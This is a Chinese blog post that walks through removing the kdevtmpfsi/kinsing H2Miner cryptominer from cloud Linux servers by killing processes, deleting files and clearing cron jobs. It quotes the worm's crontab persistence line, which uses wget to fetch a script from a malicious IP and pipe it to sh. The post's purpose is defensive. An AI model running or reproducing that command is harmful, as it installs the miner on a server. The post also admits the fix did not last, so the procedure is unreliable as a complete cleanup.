登录阿里云☁️服务器查看了一下top,发现 kdevtmpfsi 的进程 cup 占用快100%了,腾讯云官方也有相关的 处理方法 腾讯手动清除H2Miner的【2️⃣ 条建议如下】:
查找路径为/tmp/kinsing、/tmp/kinsing2、/tmp/kdevtmpfsi的进程,将其kill掉并删除对应的文件;查找crontab任务中包含“95.3.146.118”的相关项并删除。
在网络上查看发现中招的朋友不少,详细的处理过程如下【一共 5️⃣ 个步骤】
1️⃣ 查看kdevtmpfsi的守护进程kinsing先kill掉【否则kdevtmpfsi进程会不断恢复占用】
[root@aliyun ~]# ps -aux | grep kinsing[root@aliyun ~]# kill -9 kinsing_pid
2️⃣ 查看kdevtmpfsi的进程并kill掉
[root@aliyun ~]# ps -aux | grep kdevtmpfsi [root@aliyun ~]# kill -9 kdevtmpfsi_pid
3️⃣ 删除/tmp/下kdevtmpfsi相关文件
[root@aliyun ~]# cd /tmp/[root@aliyun tmp]# rm -rf kdevtmpfsi
4️⃣ 删除/var/tmp/下kinsing相关文件
[root@aliyun ~]# cd /var/tmp/[root@aliyun tmp]# rm -rf kinsing
5️⃣ 查询并删除定时任务
# 查询[root@aliyun ~]# crontab -l* * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1# 编辑删除【如果没有在用的其他定时任务可删除全部定时任务 crontab -r】[root@aliyun ~]# crontab -e
至此,阿里云的服务器问题解决 😳 【腾讯云☁️也出现了这个病毒,处理方法基本一致】实际上并未彻底解决,后来又出现了 😭 出现之后再次执行一遍即可,现在有一段时间没见到它了~
【Linux病毒】阿里云+腾讯云服务器的 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒处理(5个详细步骤)
